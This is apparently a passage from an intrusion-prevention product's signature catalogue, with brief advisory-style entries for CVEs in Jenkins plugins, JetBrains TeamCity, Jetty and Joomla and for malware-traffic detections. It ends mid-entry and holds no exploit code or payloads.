Insufficient validation of parameters causes a cross-site scripting vulnerability in Jenkins Scriptler Plugin. A successful exploit allows an attacker to execute arbitrary code on a user's browser.

Situation:

HTTP_CRL-Jenkins-Scriptler-Plugin-Parameter-Names-Stored-Cross-Site-Scripting

References:

CVE-2021-21667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21667

Jenkins-Scriptler-Plugin-Script-Content-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Scriptler Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1366-5242

Last changed:

sgpkg-ips-1366-5242

Platform:

Generic

Software:

Jenkins Scriptler Plugin

Type:

Input Validation

Description:

Insufficient validation of parameters causes a cross-site scripting vulnerability in Jenkins Scriptler Plugin. A successful exploit allows an attacker to execute arbitrary code on a user's browser.

Situation:

HTTP_CRL-Jenkins-Scriptler-Plugin-Script-Content-Stored-Cross-Site-Scripting

References:

CVE-2021-21668
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21668

Jenkins-Selenium-HTML-Report-Plugin-XML-External-Entity-Injection

About this vulnerability:

A vulnerability in Jenkins Selenium HTML Report Plugin.

Risk:

High

First detected in:

sgpkg-ips-1377-5242

Last changed:

sgpkg-ips-1377-5242

Platform:

Generic

Software:

Jenkins Selenium HTML Report Plugin

Type:

Input Validation

Description:

A vulnerability in Jenkins Selenium HTML Report Plugin, versions prior to 1.1, which allows remote attackers to discolse sensitive information by sending crafted requests to the target server, due to insufficient handling of XML external entities in report files parsed by the plugin.

Situation:

HTTP_CS-Jenkins-Selenium-HTML-Report-Plugin-XML-External-Entity-Injection

References:

CVE-2021-21672
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21672

Jenkins-Sidebar-Link-Plugin-Icon-Directory-Traversal

About this vulnerability:

A vulnerability in Jenkins Sidebar Link Plugin

Risk:

High

First detected in:

sgpkg-ips-1600-5242

Last changed:

sgpkg-ips-1600-5242

Platform:

Generic

Software:

Jenkins Sidebar Link Plugin

Type:

Directory Traversal

Description:

An information disclosure vulnerability has been reported for Jenkins Sidebar Link Plugin. This vulnerability is due to a directory traversal when handling link icons. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in information disclosure.

Situation:

HTTP_CSU-Jenkins-Sidebar-Link-Plugin-Icon-Directory-Traversal

References:

CVE-2023-32985
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32985

Jenkins-Simple-Queue-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Simple Queue Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1815-5242

Last changed:

sgpkg-ips-1815-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Insufficient sanitization of the view name in Jenkins Simple Queue Plugin causes a cross-site scripting vulnerability which can be exploited by an attacker, allowing them to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Jenkins-Simple-Queue-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2024-54003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54003

Jenkins-Stapler-Remote-Code-Execution-CVE-2018-1000861

About this vulnerability:

A vulnerability in Jenkins

Risk:

High

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

There exists a pre-auth remote code execution vulnerability in the Stapler framework used by Jenkins. Successful exploitation may lead in arbitrary code execution.

Situation:

HTTP_CRL-Jenkins-Stapler-Remote-Code-Execution-CVE-2018-1000861

References:

CVE-2018-1000861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000861

Jenkins-Urltrigger-Plugin-External-Entity-Injection

About this vulnerability:

A vulnerability in Jenkins URLTrigger Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1354-5242

Last changed:

sgpkg-ips-1354-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Insufficient validation of XML data processed by the URLTrigger Plugin causes an external entity injection vulnerability in Jenkins. A successful exploit may allow an attacker to read the contents of arbitrary files on the target system.

Situation:

HTTP_CRL-Jenkins-Urltrigger-Plugin-External-Entity-Injection

References:

CVE-2021-21659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21659

JetBrains-TeamCity-Agent-Distribution-CVE-2024-31138-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Moderate

First detected in:

sgpkg-ips-1716-5242

Last changed:

sgpkg-ips-1716-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Input Validation

Description:

Improper input validation in the Agent Distribution page causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-JetBrains-TeamCity-Agent-Distribution-CVE-2024-31138-Stored-XSS

References:

CVE-2024-31138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31138

JetBrains-TeamCity-Authentication-Bypass-CVE-2023-42793

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

High

First detected in:

sgpkg-ips-1636-5242

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in JetBrains TeamCity versions before 2023.05.4. Successfully exploiting this vulnerability allows remote code execution.

Situation:

HTTP_CSU-JetBrains-TeamCity-Authentication-Bypass-CVE-2023-42793

References:

CVE-2023-42793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42793

JetBrains-TeamCity-Authentication-Bypass-CVE-2024-27198

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Critical

First detected in:

sgpkg-ips-1699-5242

Last changed:

sgpkg-ips-1699-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in JetBrains TeamCity versions before 2023.11.4. A remote user can exploit this vulnerability to gain full access to a vulnerable TeamCity server.

Situation:

HTTP_CRL-JetBrains-TeamCity-Authentication-Bypass-CVE-2024-27198

References:

CVE-2024-27198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27198

JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Moderate

First detected in:

sgpkg-ips-1568-5242

Last changed:

sgpkg-ips-1568-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Input Validation

Description:

Insufficient validation of user data when creating or updating user's names on the target server causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

File-Text_JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
HTTP_CRL-JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
File-TextId_JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting

References:

CVE-2022-48343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48343

JetBrains-TeamCity-Backup-Directory-Traversal

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Moderate

First detected in:

sgpkg-ips-1794-5242

Last changed:

sgpkg-ips-1794-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Directory Traversal

Description:

Improper validation of the backup filename parameter in some requests causes a directory traversal vulnerability ion JetBrains TeamCity. A successful exploitation allows an attacker to write files in arbitrary locations on the target system.

Situation:

HTTP_CRL-JetBrains-TeamCity-Backup-Directory-Traversal

References:

CVE-2024-47949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47949

JetBrains-TeamCity-Backup-History-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Moderate

First detected in:

sgpkg-ips-1798-5242

Last changed:

sgpkg-ips-1798-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Input Validation

Description:

Improper validation of the backup filename parameter in certain requests causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-JetBrains-TeamCity-Backup-History-Stored-Cross-Site-Scripting

References:

CVE-2024-47950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47950

JetBrains-TeamCity-Commit-Status-Publisher-Page-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Moderate

First detected in:

sgpkg-ips-1607-5242

Last changed:

sgpkg-ips-1607-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Input Validation

Description:

Improper input validation in the Commit Status Publisher page causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploit allows an attacker to execute arbitrary code in a user's browser.

Situation:

HTTP_CRL-JetBrains-TeamCity-Commit-Status-Publisher-Page-Stored-Cross-Site-Scripting

References:

CVE-2023-34220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34220

JetBrains-TeamCity-Copy-Build-Step-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

High

First detected in:

sgpkg-ips-1636-5242

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been reported for JetBrains TeamCity. The vulnerability is due to improper validation on HTTP requests when copying build steps. A remote attacker could exploit the vulnerability by enticing a victim to open a crafted link. Successful exploitation could result in execution of arbitrary script code in the victim's browser.

Situation:

HTTP_CSU-JetBrains-TeamCity-Copy-Build-Step-Reflected-Cross-Site-Scripting

References:

CVE-2023-41249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41249

JetBrains-TeamCity-Gitlab-Connection-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Moderate

First detected in:

sgpkg-ips-1605-5242

Last changed:

sgpkg-ips-1605-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for JetBrains TeamCity. This vulnerability is due to improper input validation on the GitLab connection page. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-JetBrains-TeamCity-Gitlab-Connection-Stored-Cross-Site-Scripting

References:

CVE-2023-34229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34229

JetBrains-TeamCity-Global-Settings-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Moderate

First detected in:

sgpkg-ips-1810-5242

Last changed:

sgpkg-ips-1810-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Input Validation

Description:

Improper input validation in the "Global Settings" component causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-JetBrains-TeamCity-Global-Settings-Stored-Cross-Site-Scripting

References:

CVE-2024-47951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47951

JetBrains-TeamCity-Jspprecompilation-Authentication-Bypass-CVE-2024-23917

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

High

First detected in:

sgpkg-ips-1723-5242

Last changed:

sgpkg-ips-1723-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Malfunction

Description:

An authentication bypass vulnerability exists in JetBrains TeamCity. The vulnerability is due to improper authentication of requests of JSP files. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted requests to the target server. Successful exploitation could result in an attacker bypassing authentication mechanisms leading to, in the worst case, arbitrary code execution under the security context of the target server.

Situation:

HTTP_CRL-JetBrains-TeamCity-Jspprecompilation-Authentication-Bypass-CVE-2024-23917

References:

CVE-2024-23917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23917

JetBrains-TeamCity-Path-Traversal-CVE-2024-27199

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

High

First detected in:

sgpkg-ips-1700-5242

Last changed:

sgpkg-ips-1700-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Directory Traversal

Description:

A path traversal vulnerability has been reported in JetBrains TeamCity versions before 2023.11.4. An unauthenticated remote attacker may use this vulnerability to access certain authenticated endpoints, allowing for information disclosure and limited configuration modification.

Situation:

HTTP_CSU-JetBrains-TeamCity-Path-Traversal-CVE-2024-27199

References:

CVE-2024-27199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27199

JetBrains-TeamCity-Perforce-Connection-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Moderate

First detected in:

sgpkg-ips-1586-5242

Last changed:

sgpkg-ips-1586-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Input Validation

Description:

Improper validation of user data causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploit allows an attacker to execute arbitrary escripts in a user's browser.

Situation:

HTTP_CRL-JetBrains-TeamCity-Perforce-Connection-Stored-Cross-Site-Scripting

References:

CVE-2022-48426
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48426

JetBrains-TeamCity-Remote-Code-Execution-CVE-2019-15039

About this vulnerability:

A vulnerability in Jetbrains Teamcity

Risk:

High

First detected in:

sgpkg-ips-1353-5242

Last changed:

sgpkg-ips-1353-5242

Platform:

Windows

Software:

JetBrains TeamCity

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in JetBrains TeamCity. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Text_JetBrains-TeamCity-Remote-Code-Execution-CVE-2019-15039

References:

CVE-2019-15039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15039

JetBrains-TeamCity-SSH-Keys-Page-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Moderate

First detected in:

sgpkg-ips-1584-5242

Last changed:

sgpkg-ips-1584-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Input Validation

Description:

Improper validation of user data in the SSH keys page causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-JetBrains-TeamCity-SSH-Keys-Page-Stored-Cross-Site-Scripting

References:

CVE-2022-48428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48428

JetBrains-TeamCity-Vault-Connection-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in JetBrains TeamCity

Risk:

Moderate

First detected in:

sgpkg-ips-1838-5242

Last changed:

sgpkg-ips-1838-5242

Platform:

Generic

Software:

JetBrains TeamCity

Type:

Input Validation

Description:

Improper input validation in the Vault Connection component causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-JetBrains-TeamCity-Vault-Connection-Stored-Cross-Site-Scripting

References:

CVE-2025-24459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24459

Jetty-File-Disclosure-CVE-2021-28169

About this vulnerability:

A vulnerability in Jetty

Risk:

Moderate

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1502-5242

Platform:

Generic

Software:

Jetty Web Server

Type:

Input Validation

Description:

A file disclosure vulnerability has been reported in Jetty versions up to 9.4.40, 10.0.2, and 11.0.2. A remote attacker can exploit this vulnerability by providing a path that contains double encoded characters. Successful exploitation allows bypassing the restrictions set to protect the contents of WEB-INF and META-INF directories.

Situation:

HTTP_CSU-Jetty-File-Disclosure-CVE-2021-28169

References:

CVE-2021-28169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28169

Jetty-Web-INF-File-Disclosure

About this vulnerability:

A vulnerability in Jetty Web Server

Risk:

High

First detected in:

sgpkg-ips-1428-5242

Last changed:

sgpkg-ips-1843-5242

Platform:

Generic

Software:

Jetty Web Server

Type:

Input Validation

Description:

A vulnerability in Jetty Web Server, versions 9.4.37.v20210219, 9.4.38.v20210224 and 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5, which allows remote attackers to access files in the WEB-INFO directory by using encoded characters in the URI. Detection is for CVE-2021-34429 which includes the variant CVE-2021-28164.

Situation:

HTTP_CSU-Jetty-Web-INF-File-Disclosure

References:

CVE-2021-34429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34429

Jimcrat-Remote-Access-Tool

About this vulnerability:	Jimcrat RAT
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Jimcrat is a malicious RAT that infects Windows-based systems.
Situation:	Generic_CS-Jimcrat-Windows-Infection-Traffic

Jimureport-Freemarker-Server-Side-Template-Injection-CVE-2023-4450

About this vulnerability:

A vulnerability in JimuReport

Risk:

High

First detected in:

sgpkg-ips-1836-5242

Last changed:

sgpkg-ips-1836-5242

Platform:

Generic

Software:

JimuReport

Type:

Input Validation

Description:

A server-side template injection has been reported in JimuReport versions up to and including 1.6.0. An unauthenticated attacker can use this vulnerability to execute arbitrary commands via FreeMarker engine expressions.

Situation:

HTTP_CRL-Jimureport-Freemarker-Server-Side-Template-Injection-CVE-2023-4450

References:

CVE-2023-4450
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4450

JNDI-Exploit-Kit-Traffic

About this vulnerability:	JNDI Exploit Kit traffic detected
Risk:	High
First detected in:	sgpkg-ips-1417-5242
Last changed:	sgpkg-ips-1417-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	JNDI Exploit Kit traffic detected. JEK can be used to deliver a payload to the exploited system via LDAP protocol.
Situation:	LDAP_SS-JNDI-Exploit-Kit-Traffic

Johnson-Controls-CK720-Commands

About this vulnerability:	Configuration commands related with Johnson Controls CK720 operation
Risk:	Moderate
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Johnson Controls CK720
Type:	Misconfiguration
Description:	User commands related with Johnson Controls CK720 network controller. Detecting these commands may indicate unauthorized access to facility management tools.
Situation:	Telnet_Johnson-Controls-CK720-Reboot-Attempt Telnet_Johnson-Controls-CK720-Date-Time-Change Telnet_Johnson-Controls-CK720-Successful-Password-Change Telnet_Johnson-Controls-CK720-Successful-Login

Joizeparc-Botnet

About this vulnerability:	Joizeparc botnet
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Linux
Software:	<os>
Type:	Code Injection
Description:	Joizeparc is a worm that infects Linux-based systems.
Situation:	Generic_CS-Joizeparc-Linux-Infection-Traffic

Joltid-Peerenabler

About this vulnerability:	Joltid PeerEnabler
Risk:	Low
First detected in:	sgpkg-ips-614-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Joltid PeerEnabler
Type:	Misconfiguration
Description:	Joltid PeerEnabler is a peer-to-peer program. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Joltid-Peerenabler

Joomla!-CMS-Multiple-SQL-Injection-Vulnerabilities

About this vulnerability:

A vulnerability in Joomla!

Risk:

High

First detected in:

sgpkg-ips-1388-5242

Last changed:

sgpkg-ips-1388-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

SQL injection vulnerabilities have been reported in multiple Joomla! CMS Components.

Situation:

HTTP_CRL-Joomla!-CMS-Multiple-SQL-Injection-Vulnerabilities

References:

CVE-2018-5974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5974

Joomla!-CMS-User-Notes-List-View-SQL-Injection

About this vulnerability:

A vulnerability in Joomla!

Risk:

Moderate

First detected in:

sgpkg-ips-1129-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in the User Notes component of Joomla! CMS. The vulnerability is due to a lack of type casting of a variable in an SQL statement in the User Notes list view. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in the execution of crafted SQL queries against the underlying database.

Situation:

HTTP_CRL-Joomla!-CMS-User-Notes-List-View-SQL-Injection

References:

CVE-2018-8045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8045

Joomla!-CMS-Webservice-Authentication-Bypass

About this vulnerability:

A vulnerability in Joomla! CMS

Risk:

High

First detected in:

sgpkg-ips-1614-5242

Last changed:

sgpkg-ips-1614-5242

Platform:

Generic

Software:

Joomla

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in Joomla! CMS. The vulnerability is due to improper request parameters sanitization when accessing the Webservice API. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable API. Successful exploitation could lead to the disclosure of sensitive information.

Situation:

HTTP_CRL-Joomla!-CMS-Webservice-Authentication-Bypass
HTTP_CRL-Joomla!-CMS-Webservice-Authentication-Bypass-Sensitive-File-Access

References:

CVE-2023-23752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23752

Joomla-Akeeba-Kickstart-Remote-Code-Execution

About this vulnerability:

A Joomla Akeeba Kickstart Remote Code Execution Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Joomla

Type:

Insecure Configuration

Description:

A vulnerability in Joomla Akeeba Kickstart, in various versions, which allow remote attackers to bypass encryption and execute arbitrary code by the use of a crafted command message which will extract an archive from a remote location.

Situation:

HTTP_CRL-Joomla-Akeeba-Kickstart-Remote-Code-Execution

References:

CVE-2014-7228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7228

Joomla-Arbitrary-File-Upload

About this vulnerability:

A Joomla Arbitrary File Upload vulnerability.

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

A vulnerability in Joomla, versions 2.5.x before 2.5.14 and 3.x before 3.1.5, which allows remote attackers to bypass access restrictions and upload arbitrary files using a trailing "." (dot), possibly resulting in arbitrary code execution.

Situation:

HTTP_CS-Joomla-Arbitrary-File-Upload

References:

CVE-2013-5576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5576

BID-61582
http://www.securityfocus.com/bid/61582

Joomla-CMS-CleanTags-Reflected-Cross-Site-Scripting

About this vulnerability:

An attempt to exploit a vulnerability in Joomla CMS detected.

Risk:

High

First detected in:

sgpkg-ips-1706-5242

Last changed:

sgpkg-ips-1706-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

A vulnerability in Joomla CMS, versions 3.7.0 through 3.10.15-elts, 4.x.x prior to 4.4.3, 5.x.x prior to 5.0.3, which allows attackers to execute arbitrary code in a victim's browser, due to insufficient filtering of HTML tags in user provided data.

Situation:

HTTP_CS-Joomla-CMS-CleanTags-Reflected-Cross-Site-Scripting

References:

CVE-2024-21726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21726

Joomla-CMS-Mod_breadcrumbs-Title-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Joomla! CMS

Risk:

Moderate

First detected in:

sgpkg-ips-1317-5242

Last changed:

sgpkg-ips-1317-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in Joomla! CMS Core. The vulnerability is due to improper validation of the title parameter in the mod_breadcrumbs module. A remote, authenticated attacker can exploit the vulnerability by sending a crafted request to the server. Successful exploitation could result in the execution of arbitrary script code in the target user's browser.

Situation:

HTTP_CRL-Joomla-CMS-Mod_breadcrumbs-Title-Stored-Cross-Site-Scripting

References:

CVE-2021-23124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23124

Joomla-CMS-Mod_Random_Image-Link-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Joomla! CMS

Risk:

Moderate

First detected in:

sgpkg-ips-1313-5242

Last changed:

sgpkg-ips-1313-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

Improper validation of the link parameter in the mod_random_image module vauses a cross-site scripting vulnerability in Joomal. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Joomla-CMS-Mod_Random_Image-Link-Stored-Cross-Site-Scripting

References:

CVE-2020-15696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15696

Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities

About this vulnerability:

A vulnerability in Joomla! Joomla!

Risk:

Moderate

First detected in:

sgpkg-ips-819-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

Improper handling of request parameters causes a policy bypass and privilege escalation vulnerability in the Joomla CMS. Successful exploitation allows an attacker to access functionality that has been disabled by policies.

Situation:

HTTP_CS-Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities
HTTP_CRL-Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities

References:

CVE-2016-8869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8869

Joomla-CMS-Protostar-Template-Error-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Joomla

Risk:

Moderate

First detected in:

sgpkg-ips-1343-5242

Last changed:

sgpkg-ips-1343-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

Improper validation of the logoFile parameter in the error.php of the Protostar template causes a cross-site scripting vulnerability in Joomla. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Joomla-CMS-Protostar-Template-Error-Stored-Cross-Site-Scripting

References:

CVE-2021-26030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26030

Joomla-Com_Fields-SQL-Injection

About this vulnerability:

A vulnerability in Joomla!

Risk:

High

First detected in:

sgpkg-ips-919-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

There exists an SQL injection vulnerability in Joomla!. A remote, unauthenticated attacker could use this to gain sensitive information.

Situation:

HTTP_CRL-Joomla-Com_Fields-SQL-Injection

References:

CVE-2017-8917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917

Joomla-Content-History-SQL-Injection

About this vulnerability:

A Joomla Content History SQL Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-775-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Joomla

Type:

SQL Injection

Description:

A vulnerability in Joomla, versions 3.2 to 3.4.4, in the getListQuery function, which allows remote attackers to execute arbitrary SQL commands via the list[select] parameter to index.php. CVE-2015-7857 CVE-2015-7858 are covered.

Situation:

HTTP_CRL-Joomla-Content-History-SQL-Injection

References:

CVE-2015-7297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7297

Joomla-JoomlaWorks-AllVideos-Directory-Traversal-Disclosure

About this vulnerability:

JoomlaWorks AllVideos allows remote attacker to read arbitrary files

Risk:

Moderate

First detected in:

sgpkg-ips-289-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Joomla

Type:

Malfunction

Description:

A remote file disclosure vulnerability exists in JoomlaWorks AllVideos. The vulnerability allows a remote attacker to execute a directory traversal attack and thus download and view arbitrary files.

Situation:

HTTP_CSU-Joomla-AllVideos-File-Disclosure

References:

CVE-2010-0606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0606

BID-38238
http://www.securityfocus.com/bid/38238

OSVDB-62331
http://www.osvdb.org/62331

Joomla-Remote-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in Joomla

Risk:

High

First detected in:

sgpkg-ips-713-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Input Validation

Description:

There is a critical remote code execution vulnerability in Joomla Core. Joomla! CMS versions 1.5.0 through 3.4.5 do not properly filter browser information when session values are saved into the database which leads to a remote code execution vulnerability.

Situation:

HTTP_CSH-Joomla-Remote-Code-Execution-Vulnerability

References:

CVE-2015-8562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562

Joomla-TinyBrowser-File-Upload-Code-Execution

About this vulnerability:

A Joomla TinyBrowser File Upload Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-710-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TinyBrowser

Type:

Input Validation

Description:

A vulnerability in Joomla TinyBrowser, version 1.5.12, which allows remote attackers to upload arbitrary PHP files, resulting in code execution, due to the insufficient file type validation.

Situation:

HTTP_CS-Joomla-TinyBrowser-File-Upload-Code-Execution

References:

CVE-2011-4908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4908

OSVDB-64578
http://www.osvdb.org/64578

Joomla-TinyMCE-File-Upload-Remote-Code-Execution

About this vulnerability:	A vulnerability in Joomla TinyMCE file uploads
Risk:	Moderate
First detected in:	sgpkg-ips-614-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Joomla
Type:	Code Injection
Description:	There is a vulnerability in some versions of Joomla where malicious file upload via TinyMCE content editor may be used for remote code execution.
Situation:	HTTP_CSU-Joomla-TinyMCE-File-Upload-Remote-Code-Execution

Joomla-Webring-Remote-File-Include-Vulnerability

About this vulnerability:

Joomla Webring Remote File Include Vulnerability

Risk:

High

First detected in:

sgpkg-ips-343-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

